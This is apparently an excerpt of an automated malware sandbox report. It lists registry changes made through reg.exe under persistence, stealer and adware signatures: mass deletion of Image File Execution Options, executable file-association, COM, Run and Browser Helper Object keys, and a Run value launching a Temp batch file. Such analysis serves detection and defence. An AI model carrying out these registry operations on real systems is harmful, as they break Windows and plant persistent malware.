Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Microsoft Shared Fax Monitor C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Appmon C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Appmon\Ports C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Standard TCP/IP Port\Ports C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port\Adapters\IPP C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port\Adapters\WSPrint C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port\Adapters C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Local Port C:\Windows\system32\reg.exe N/A

Sets file execution options in registry

persistence
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msoadfsb.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msoxmled.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordconv.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ieUnatt.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\excelcnv.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ie4uinit.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msqry32.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ngen.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PresentationHost.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\splwow64.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\clview.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msosync.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\selfcert.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SystemSettings.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winword.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msoasb.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\excel.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\graph.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ielowutil.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MRT.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PrintIsolationHost.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sdxhelper.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AcroRd32Info.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setlang.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ieinstal.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mscorsvw.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msfeedssync.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msohtmed.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msosrec.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powerpnt.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ExtExport.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ngentask.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\onenotem.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RdrCEF.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runtimebroker.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spoolsv.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RdrServicesUpdater.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\onenote.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\orgchart.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PrintDialog.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AcroRd32.exe C:\Windows\system32\reg.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex\ContextMenuHandlers\Compatibility C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\Compatibility C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\CLSID C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\{00021401-0000-0000-C000-000000000046} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex\ContextMenuHandlers C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex\{8895b1c6-b41f-4c1c-a562-0d564250836f} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\DropHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\OpenContainingFolderMenu C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\IconHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex\DropHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\PintoStartScreen C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\DefaultIcon C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex\DropHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runasuser C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\DefaultIcon C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\DropHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\IconHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\tabsets C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\DropHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers C:\Windows\system32\reg.exe N/A

Reads user/profile data of web browsers

spyware stealer

Registers COM server for autorun

persistence
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0198-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0009-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0113-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0174-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00020820-0000-0000-C000-000000000046}\InprocServer32\15.0.0.0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0185-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0230-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0000050B-0000-0010-8000-00AA006D2EA4}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0037-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0205-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0015-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0147-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0013-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0015-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0232-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0210-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0085-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0239-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3FD37ABB-F90A-4DE5-AA38-179629E64C2F}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0059-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0038-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0263-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{000209FF-0000-0000-C000-000000000046}\LocalServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0345-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0404-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0114-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0190-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0229-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0359-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0176-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0293-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0339-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0169-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0029-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0166-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0113-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0330-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0332-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0370-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E68d2B3E-192D-448E-827E-239082D74DC6}\InProcServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BE39F3DA-1B13-11D0-887F-00A0C90F2744}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0173-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0261-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0193-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0095-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C100BEEE-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0163-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0004-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0019-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0151-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0220-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{45EAE363-122A-445A-97B6-3DE890E786F8}\LocalServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0043-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0121-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0037-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0074-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0214-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0270-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0379-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0148-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0244-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0129-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0005-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_awspeGfa_w32 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\QuikWipes.bat" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_awspeGfa_w32 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\QuikWipes.bat" C:\Windows\system32\reg.exe N/A

Installs/modifies Browser Helper Object

stealer adware
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects C:\Windows\system32\reg.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\Windows\system32\reg.exe N/A
